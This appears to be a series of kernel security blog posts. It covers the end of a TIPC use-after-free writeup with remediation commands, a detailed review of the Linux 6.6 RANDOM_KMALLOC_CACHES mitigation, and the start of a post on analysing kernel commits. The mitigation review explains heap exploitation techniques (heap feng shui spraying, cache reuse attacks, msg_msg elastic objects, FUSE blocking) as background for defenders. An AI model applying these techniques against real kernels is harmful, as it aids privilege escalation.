        head->truesize += frag->truesize;
        head->data_len += frag->len;
        head->len += frag->len;
        TIPC_SKB_CB(head)->tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)->validated = 0;
        if (unlikely(!tipc_msg_validate(&head)))
            goto err;
        *buf = head;                                          [0]
        TIPC_SKB_CB(head)->tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    // before the patch: *buf = NULL;                         [1]
    return 0;
err:
    kfree_skb(*buf);
    kfree_skb(*headbuf);
    *buf = *headbuf = NULL;
    return 0;
}

net/tipc/msg.c (it’s not on elixir yet, but will link)

So if we recall our vulnerable case, after we’ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, we hit the error case at [0]. We then go to err: and cause the UAF, as buf was never cleared at [1].

By the time we reach [2] we know that the input skb is a trailing fragment and is referenced by both buf and frag. At this point we don’t need the buf reference as the following block handles the input skb appropriately via frag: either it is coalesced into head and freed [3] or it is added to head’s frag list at which point head is responsible for it [4].

As a result, we can just clear the unnecessary buf reference before it can cause any trouble. Hopefully that’s not too convoluted an explanation for a simple patch!
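The general pattern behind the patch (“once ownership has moved, drop your own reference”) can be shown with a plain linked list in userspace. This is a generic sketch rather than the TIPC code: model_node, model_free_chain() and model_append_then_fail() are made-up names, and it uses ordinary calloc()/free():

```c
#include <assert.h>
#include <stdlib.h>

struct model_node {
	struct model_node *next;
};

/* Frees a list head and every node chained to it; NULL is a no-op.
 * Returns the number of nodes released. */
static int model_free_chain(struct model_node *head)
{
	int freed = 0;

	while (head) {
		struct model_node *next = head->next;

		free(head);
		freed++;
		head = next;
	}
	return freed;
}

/* Hands `*item` to `head`, then takes an error path that frees both
 * references. Returns the number of nodes released. */
static int model_append_then_fail(struct model_node *head,
				  struct model_node **item)
{
	int freed;

	assert(head && item);
	head->next = *item;   /* ownership moves to head's chain */
	*item = NULL;         /* drop the caller's now-redundant reference */

	/* error path: safe, because *item no longer aliases a chained node */
	freed = model_free_chain(*item);
	freed += model_free_chain(head);
	return freed;
}
```

Without the *item = NULL line, the error path would free the item directly and then again while walking the head’s chain, which is the same shape of bug as the one we’ve been looking at.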

Remediation

Chances are, as I mentioned up top, unless you’re running TIPC you’re all good! However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be disabled from loading if not in use:

- `$ lsmod | grep tipc` will let you know if the module is currently loaded
- `$ modprobe -r tipc` may allow you to unload the module if loaded, however you may need to reboot your system
- `$ echo "install tipc /bin/true" >> /etc/modprobe.d/disable-tipc.conf` will prevent the module from being loaded, which is a good idea if you have no reason to use it

Wrapup

As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing too much context; I appreciate it’s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!

I’d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!

There’s quite a few things I’d love to do in follow-up to this post, if I can only find the time! I’d be happy to go into more detail on the discovery process and working with syzkaller, I really want to play around with exploitation and I also think it’d be neat to expand the Linternals blog series with some networking content!

In the meantime, if you’re interested in modifying syzkaller, check out @notselwyn’s post on “Tickling ksmbd: fuzzing SMB in the Linux kernel”, I found it super helpful!

Feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Exploring Linux's New Random Kmalloc Caches

sam4k — Fri, 03 Nov 2023 14:10:43 +0000

In this post we’re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, RANDOM_KMALLOC_CACHES, looks to address that.

To provide some context to the problems RANDOM_KMALLOC_CACHES tries to address, we’ll spend a bit of time covering the current heap exploitation meta. This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.

Armed with that information we’ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.

As this post is focusing on kernel heap exploitation, I’ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I’ve written about this already in some detail as part of Linternals, here).

Current Heap Exploitation Meta
Introducing Random Kmalloc Caches
Diving Into The Implementation
What’s The New Meta?
Wrapping Up

Current Heap Exploitation Meta

Alright, before we dive into the juicy details let’s quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it affects things!

Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we’re referring to memory dynamically allocated via the slab allocator (e.g. [kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590)) or directly via the page allocator (e.g. [alloc_pages()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269)).

The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.

In reality, these heap corruptions can come in all shapes and sizes. The objects we’re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly our overflows can also have any number of constraints which impact our approach to leverage the corruption.

However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations.

From a defender’s perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.

Approaching Heap Exploitation

Okay with the exposition out of the way, let’s talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I’m going to (try to) keep things fairly high level, with a focus on the slab allocator side of things due to the topic’s context.

So first things first we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are affected, what are the risks of a kernel panic?

Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we’re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted.

There are several factors to consider at the moment when determining what cache our object will end up in:

The API used will tell us if it’s allocated into a general purpose cache with other similar sized objects (kmalloc(), kzalloc(), kcalloc() etc.) or a private cache ([kmem_cache_alloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499)) with slabs containing only objects of that type.
The GFP (Get Free Page) flags used can tell us which of the general purpose cache types the object is allocated to. By default, allocations will go to the standard general purpose caches, kmalloc-x, where x is the “bucket size”. The other common case is GFP_KERNEL_ACCOUNT, typically used for untrusted allocations[1], which will put objects in an accounted cache, named kmalloc-cg-x.
The size of the object will determine, for general purpose caches, which “bucket size” the object will end up in. The x in kmalloc-x denotes the fixed size in bytes allocated to each object in the cache’s slabs. Objects will be allocated into the smallest general purpose cache they can fit into.

Now we’ve built up an understanding of the bug and how the affected object is allocated, it’s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can’t be allocated into the same slab.

The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible.

Current Mitigations

However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won’t be an exhaustive list, but will help provide some context on the current meta:

[CONFIG_SLAB_FREELIST_HARDENED](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html) adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab and checks for double-frees.
[CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) randomises the freelist order when a new cache slab is allocated, such that an attacker can’t infer the order in which objects within that slab will be filled. The aim is to reduce the knowledge & control attackers have over heap state.
[CONFIG_STATIC_USERMODEHELPER](https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html) mitigates a popular technique for leveraging heap corruption, which we’ll touch on in the next section.
Slab merging, enabled via slub_merge bootarg or CONFIG_SLAB_MERGE_DEFAULT=y, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption.
Some others, which are less commonly enabled afaik, or out of scope include [CONFIG_SHUFFLE_PAGE_ALLOCATOR](https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html), [CONFIG_CFI_CLANG](https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html), init_on_alloc / [CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html) & init_on_free / [CONFIG_INIT_ON_FREE_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html).

Generic Techniques

Okay, now we’re ready to start pwning the heap. We understand our bug, the allocation context and the kind of mitigations we’re dealing with. Let’s explore some contemporary techniques used to get around these mitigations and exploit heap corruption bugs!

Basic Heap Feng Shui

A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as “heap feng shui”. We can use our understanding of how the allocator works and the mitigations in place to try get things where we want them in the heap.

Let’s use a generic heap overflow to demonstrate this. We can overflow object x and we want to corrupt object y. They’re in the same generic cache, so our goal is to land y adjacent to x in the same slab.

We want to consider how active the cache is (aka how much cache noise there is) and up-time, as this will give us an idea of the cache slab state. On a typical workload with a fairly well-used cache size, we can assume there are likely to be several partially filled slabs; this is our starting state.

A basic heap feng shui approach would be to first allocate a number of object y instances to fill up the holes in the partial slabs.

Then, we allocate several slabs’ worth of object y, which we can assume will trigger new slabs to be allocated, hopefully filled with object y.

Then, from the second batch of allocations into new slabs, we would free every other allocation to try and create holes in the new slabs.

We would then allocate our vulnerable object x, in the hopes that we have increased the chances of it being allocated into one of the holes we just created.

Cache Reuse/Overflow Attacks

Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, really wanted to corrupt in another cache?

If we recall our memory allocator fundamentals[2], we know that the page allocator is the fundamental memory allocator for the Linux kernel, with the slab allocator sitting above it. So the slab allocator makes use of the page allocator, including for the allocation of the chunks of memory used as slabs (to hold cache objects). Are you still with me?

So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going?

If we have a UAF on an object in a private cache slab, and that slab is then freed and reallocated to a general purpose cache, suddenly our UAF’d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!

This kind of technique is known as a “cache reuse” attack and has been documented previously in more detail[3]. By using a similar approach of manipulating the underlying page layout, “cache overflow” attacks are possible too, where you align two slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups[4].

Elastic Objects

Another cornerstone of contemporary heap exploitation is the use of “elastic objects”[6]. These are essentially structures that have a dynamic size; typically a length field will describe the size of a buffer within the same struct.

Sounds pretty straight forward, right? Why is this relevant? Well, we’ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes.

Elastic objects can provide generic techniques for exploiting these vulnerabilities, as they are objects that can be corrupted across a variety of cache sizes due to their elastic nature. By generalising the object being corrupted, we can save a lot of the time otherwise spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!).

A popular elastic object used in contemporary heap exploitation is [struct msg_msg](https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9), which can be used to leverage an out-of-bounds heap write into arbitrary read/write[5]:

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

include/linux/msg.h (v6.6)

FUSE

Seeing as we’re going all out on the exploitation techniques here, I might as well throw in a quick shoutout to FUSE as well, which is commonly used in kernel exploitation.

Filesystem in Userspace “is an interface for userspace programs to export a filesystem to the Linux kernel.”[7], enabled via [CONFIG_FUSE_FS](https://cateee.net/lkddb/web-lkddb/FUSE_FS.html)=y. Essentially it allows users, often unprivileged ones, to define their own filesystems.

Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we’re able to define what happens when the kernel tries to read one of our FUSE files, which includes sleeping…

This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially any access to user virtual addresses we control, as we can map in one of our FUSE files and pass that over to the kernel).

So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand, if they’re immediately freed there’s not too much we can do with them … right?

Perhaps! This is where FUSE comes in: if we have a scenario where an object we really, really want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there’s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this 2018 Duasynt blog post.

[1] https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst
[2] https://sam4k.com/linternals-memory-allocators-part-1/
[3] https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022
[4] https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
[5] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
[6] the earliest mention i’m aware of in a kernel xdev context is from the 2020 paper, “A Systematic Study of Elastic Objects in Kernel Exploitation”, could be wrong tho
[7] https://github.com/libfuse/libfuse
[8] https://duasynt.com/blog/linux-kernel-heap-spray

Introducing Random Kmalloc Caches

Well, that was quite the background read (sorry not sorry), but we’re hopefully in a good position to dive into this new mitigation: Random kmalloc caches[1].

This mitigation affects the generic slab cache implementation. Previously, there was a single generic slab cache for each size “step”: kmalloc-32, kmalloc-64, kmalloc-128 etc. As a result, a 40 byte object, allocated via kmalloc() with the correct GFP flags, is always going to end up in the kmalloc-64 cache. Straightforward right?

CONFIG_RANDOM_KMALLOC_CACHES=y introduces multiple generic slab caches for each size, 16 by default (named kmalloc-rnd-01-32, kmalloc-rnd-02-32 etc.). When an object is allocated via kmalloc(), it is allocated to one of these 16 caches “randomly”, depending on the callsite for the kmalloc() and a per-boot seed.

Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it’s harder for an attacker to target specific objects or caches for exploitation.

If you’re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.[2][3][4]

Diving Into The Implementation

The time has come, I’m sure you’ve all been chomping at the bit for the last 2000 words, let’s dig into the implementation for this patch and see what the deal is.

Honestly the implementation for this mitigation is actually pretty straightforward, with only 97 additions and 15 deletions across 7 files, so more than anything it’s going to be a bit of a primer on the parts of the kmalloc API that are affected by this patchset.

We’ll follow up with a bit of an analysis on the pros and cons of the implementation tho.

Cache Setup

So first things first let’s touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies.

The header additions include configurations for things like the number of cache copies:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define RANDOM_KMALLOC_CACHES_NR	15 // # of cache copies
+#else
+#define RANDOM_KMALLOC_CACHES_NR	0
+#endif

The [kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) enum is used to manage the different kmalloc cache types. [create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956) allocates the initial [struct kmem_cache](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98) objects, which represent the slab caches we’ve been talking about, which are then stored in the exported [struct kmem_cache * kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677) array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, the other is the size index for that cache type (see [size_index[24]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692)).

With that in mind, an entry for each of the cache copies is added to [enum kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) so that they’re created and fetchable as part of the existing API:

enum kmalloc_cache_type {
	KMALLOC_NORMAL = 0,
#ifndef CONFIG_ZONE_DMA
	KMALLOC_DMA = KMALLOC_NORMAL,
#endif
#ifndef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP = KMALLOC_NORMAL,
#endif
+	KMALLOC_RANDOM_START = KMALLOC_NORMAL,
+	KMALLOC_RANDOM_END = KMALLOC_RANDOM_START + RANDOM_KMALLOC_CACHES_NR,
#ifdef CONFIG_SLUB_TINY
	KMALLOC_RECLAIM = KMALLOC_NORMAL,
#else
	KMALLOC_RECLAIM,
#endif
#ifdef CONFIG_ZONE_DMA
	KMALLOC_DMA,
#endif
#ifdef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP,
#endif
	NR_KMALLOC_TYPES
};

diff from include/linux/slab.h

The [kmalloc_info[]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824) array is another key data structure in the kmalloc cache initialisation. This array essentially contains a [struct kmalloc_info_struct](https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275) for each of the kmalloc “bucket” sizes we talk about. Each element stores the size of the bucket and the name for the various cache types of that size, e.g. kmalloc-rnd-01-64 or kmalloc-cg-64.

This array is then used to pull the correct cache name to pass to [create_kmalloc_cache()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661) given the size index and cache type.

I’m speeding through this, but you can probably tell already this is going to involve some macros. [INIT_KMALLOC_INFO(__size, __short_size)](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809) is used to initialise each of the elements in kmalloc_info[], with additional macros to initialise each of the name[] elements according to type.

Below we can see the addition of the kmalloc random caches:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define __KMALLOC_RANDOM_CONCAT(a, b) a ## b
+#define KMALLOC_RANDOM_NAME(N, sz) __KMALLOC_RANDOM_CONCAT(KMA_RAND_, N)(sz)
+#define KMA_RAND_1(sz)                  .name[KMALLOC_RANDOM_START +  1] = "kmalloc-rnd-01-" #sz,
+#define KMA_RAND_2(sz)  KMA_RAND_1(sz)  .name[KMALLOC_RANDOM_START +  2] = "kmalloc-rnd-02-" #sz,
+#define KMA_RAND_3(sz)  KMA_RAND_2(sz)  .name[KMALLOC_RANDOM_START +  3] = "kmalloc-rnd-03-" #sz,
+#define KMA_RAND_4(sz)  KMA_RAND_3(sz)  .name[KMALLOC_RANDOM_START +  4] = "kmalloc-rnd-04-" #sz,
+#define KMA_RAND_5(sz)  KMA_RAND_4(sz)  .name[KMALLOC_RANDOM_START +  5] = "kmalloc-rnd-05-" #sz,
+#define KMA_RAND_6(sz)  KMA_RAND_5(sz)  .name[KMALLOC_RANDOM_START +  6] = "kmalloc-rnd-06-" #sz,
+#define KMA_RAND_7(sz)  KMA_RAND_6(sz)  .name[KMALLOC_RANDOM_START +  7] = "kmalloc-rnd-07-" #sz,
+#define KMA_RAND_8(sz)  KMA_RAND_7(sz)  .name[KMALLOC_RANDOM_START +  8] = "kmalloc-rnd-08-" #sz,
+#define KMA_RAND_9(sz)  KMA_RAND_8(sz)  .name[KMALLOC_RANDOM_START +  9] = "kmalloc-rnd-09-" #sz,
+#define KMA_RAND_10(sz) KMA_RAND_9(sz)  .name[KMALLOC_RANDOM_START + 10] = "kmalloc-rnd-10-" #sz,
+#define KMA_RAND_11(sz) KMA_RAND_10(sz) .name[KMALLOC_RANDOM_START + 11] = "kmalloc-rnd-11-" #sz,
+#define KMA_RAND_12(sz) KMA_RAND_11(sz) .name[KMALLOC_RANDOM_START + 12] = "kmalloc-rnd-12-" #sz,
+#define KMA_RAND_13(sz) KMA_RAND_12(sz) .name[KMALLOC_RANDOM_START + 13] = "kmalloc-rnd-13-" #sz,
+#define KMA_RAND_14(sz) KMA_RAND_13(sz) .name[KMALLOC_RANDOM_START + 14] = "kmalloc-rnd-14-" #sz,
+#define KMA_RAND_15(sz) KMA_RAND_14(sz) .name[KMALLOC_RANDOM_START + 15] = "kmalloc-rnd-15-" #sz,
+#else // CONFIG_RANDOM_KMALLOC_CACHES
+#define KMALLOC_RANDOM_NAME(N, sz)
+#endif
+
 #define INIT_KMALLOC_INFO(__size, __short_size)			\
 {								\
 	.name[KMALLOC_NORMAL]  = "kmalloc-" #__short_size,	\
 	KMALLOC_RCL_NAME(__short_size)				\
 	KMALLOC_CGROUP_NAME(__short_size)			\
 	KMALLOC_DMA_NAME(__short_size)				\
+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
 	.size = __size,						\
 }

const struct kmalloc_info_struct kmalloc_info[] __initconst = {
	INIT_KMALLOC_INFO(0, 0),
	INIT_KMALLOC_INFO(96, 96),
	INIT_KMALLOC_INFO(192, 192),
	INIT_KMALLOC_INFO(8, 8),
	INIT_KMALLOC_INFO(16, 16),
	INIT_KMALLOC_INFO(32, 32),
	INIT_KMALLOC_INFO(64, 64),
	INIT_KMALLOC_INFO(128, 128),
	INIT_KMALLOC_INFO(256, 256),
	INIT_KMALLOC_INFO(512, 512),
	INIT_KMALLOC_INFO(1024, 1k),
	INIT_KMALLOC_INFO(2048, 2k),
	INIT_KMALLOC_INFO(4096, 4k),
	INIT_KMALLOC_INFO(8192, 8k),
	INIT_KMALLOC_INFO(16384, 16k),
	INIT_KMALLOC_INFO(32768, 32k),
	INIT_KMALLOC_INFO(65536, 64k),
	INIT_KMALLOC_INFO(131072, 128k),
	INIT_KMALLOC_INFO(262144, 256k),
	INIT_KMALLOC_INFO(524288, 512k),
	INIT_KMALLOC_INFO(1048576, 1M),
	INIT_KMALLOC_INFO(2097152, 2M)
};

diff from mm/slab_common.c

Seed Setup

Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular kmalloc() call site is going to end up in.

This is initialised during the initial kmalloc cache creation and is stored in the exported symbol [random_kmalloc_seed](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398), as we can see below:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+unsigned long random_kmalloc_seed __ro_after_init;
+EXPORT_SYMBOL(random_kmalloc_seed);
+#endif

...

void __init create_kmalloc_caches(slab_flags_t flags)
{
    ...
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+	random_kmalloc_seed = get_random_u64();
+#endif

diff from mm/slab_common.c

It’s worth noting here the [__init](https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52) and __ro_after_init annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn’t need to hang around in memory after everything’s set up.

__ro_after_init was introduced by Kees Cook back in 2016[1] to reduce the writable attack surface in the kernel by moving memory that’s only written to during kernel initialisation to a read-only memory region.

Kmalloc Allocations

Okay, so we’ve covered how the caches are created and the seed initialisation, how are objects then actually allocated to one of these random kmalloc caches?

As we touched on, the random cache a particular allocation ends up in comes from two factors: the kmalloc() callsite and the per-boot random_kmalloc_seed:

+static __always_inline enum kmalloc_cache_type kmalloc_type(gfp_t flags, unsigned long caller)
 {
 	/*
 	 * The most common case is KMALLOC_NORMAL, so test for it
 	 * with a single branch for all the relevant flags.
 	 */
 	if (likely((flags & KMALLOC_NOT_NORMAL_BITS) == 0))
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+		/* RANDOM_KMALLOC_CACHES_NR (=15) copies + the KMALLOC_NORMAL */
+		return KMALLOC_RANDOM_START + hash_64(caller ^ random_kmalloc_seed,
+						      ilog2(RANDOM_KMALLOC_CACHES_NR + 1));
+#else
 		return KMALLOC_NORMAL;
+#endif

diff from include/linux/slab.h

As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the kmalloc random caches, a hash is generated from the two values mentioned and is used to calculate the kmalloc cache type (from the [kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) enum, which reserves a value for each of the RANDOM_KMALLOC_CACHES_NR copies), which is then used to fetch the cache from kmalloc_caches[].

static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size) && size) {
		unsigned int index;

		if (size > KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);

 		index = kmalloc_index(size);
 		return kmalloc_trace(
-				kmalloc_caches[kmalloc_type(flags)][index],
+				kmalloc_caches[kmalloc_type(flags, _RET_IP_)][index],
 				flags, size);
 	}
 	return __kmalloc(size, flags);
}

diff from include/linux/slab.h

We can see kmalloc() now passes the caller, using the [_RET_IP_](https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7) macro, to kmalloc_type(). This means the unsigned long caller used to generate the hash is the return address for the kmalloc() call.

Thoughts

To wrap things up on the implementation side of things, let’s discuss some of the pros and cons for RANDOM_KMALLOC_CACHES. As the config help text explains, the aim of this hardening feature is to make it “more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.”[2].

It’s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature’s implementation, it does shake up the existing techniques commonly seen for shaping the heap and exploiting heap vulnerabilities.

On top of that, it’s a reasonably lightweight and performance friendly implementation, pretty much exclusively touching the slab allocator implementation.

It is because of that last point, though, that it is unable to provide any mitigation against the cache reuse and overflow techniques mentioned earlier, as this relies on manipulating the underlying page allocator which isn’t addressed by this patch.

As a result, in certain circumstances you could cause one of these random kmalloc cache slabs containing your vulnerable object to be freed and have it reallocated to a more favourable cache. The same could be said for the cache overflow attacks.

An implementation specific point to note is on the use of the kmalloc return address (for kmalloc(), kmalloc_node(), __kmalloc() etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as [f2fs_kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379), any objects using that wrapper can share the same _RET_IP_ from the slab allocator’s perspective and end up in the same cache.

What’s The New Meta?

Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post RANDOM_KMALLOC_CACHES, it’s worth highlighting that just because it’s in the 6.6 kernel doesn’t mean we’ll see it for a while.

First of all, the 6.6 kernel is the latest release and it’ll be a while until we see this get sizeable uptake in the real world. Secondly, it’s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! cough modprobe_path).

Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity’s AUTOSLAB[1] and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I’d love to get into here, perhaps another post?!)[2]. These could potentially see more uptake in the long run than RANDOM_KMALLOC_CACHES, or vice versa.

But if we were interested in tackling heap exploitation in a RANDOM_KMALLOC_CACHES environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn’t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks.

So perhaps we see a world where “generic techniques” shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed.

It’s hard to say this early on, and without spending more time on the problem, whether we’d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that’s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening’s sake).

That said, I’m sure the same was said about previous hardening features so who knows!

Wrapping Up

Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :)

We talked about the new kernel mitigation RANDOM_KMALLOC_CACHES and gave some context into the problems it’s trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.

I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it’d be good to get this out rather than maybe get that out.

That said, maybe I’ll try write up some old heap ndays on a RANDOM_KMALLOC_CACHES=y system to try and demonstrate the different approaches required. That sounds quite fun!

Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I’ll do some more of that going forward (maybe the kCTF experimental mitigations???).

Anyways, you’ve endured enough of my waffling, thanks for reading! As always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Analysing Linux Kernel Commits

sam4k — Tue, 07 Feb 2023 20:01:23 +0000

It’s been a while, hasn’t it? This post is going to be a bit of a change of pace from usual, as it’s actually covering some research from last year I ended up dropping.

The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together.

However, between both IRL circumstances and simply underestimating the time involved, this has dragged on more than I’d like for a blog post to take and I’m eager to move onto new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I’d share the tool I ended up writing and discuss some background behind it as well as my own takeaways during my time working on this stuff.

So in this post I’ll talk a little about the background behind the motivations for looking into this and why kernel security fixes are an interesting topic. Then I’ll do a quick tl;dr on the tool I wrote, Lica (Linux Commit Analyser), and share some takeaways.

Disclaimer

Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here are from the experiences (and biases) of a security researcher.

Where there are gaps in my understanding or knowledge, I’ll try to highlight them, and if anyone has any corrections or additional info please let me know, thank you!

Background

The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of “silent security fixes”.

First of all, to give some context to what we’re talking about, let’s do a quick tl;dr on kernel development and some of the terms mentioned so we’re all up to speed! (feel free to skip)

kernel dev tl;dr

“The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel […] Day-to-day development discussions take place on the Linux kernel mailing list (LKML). Changes are tracked using the version control system git” [1]

Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the Linux kernel source tree mirror on GitHub has 1,154,596 commits that we can peruse!

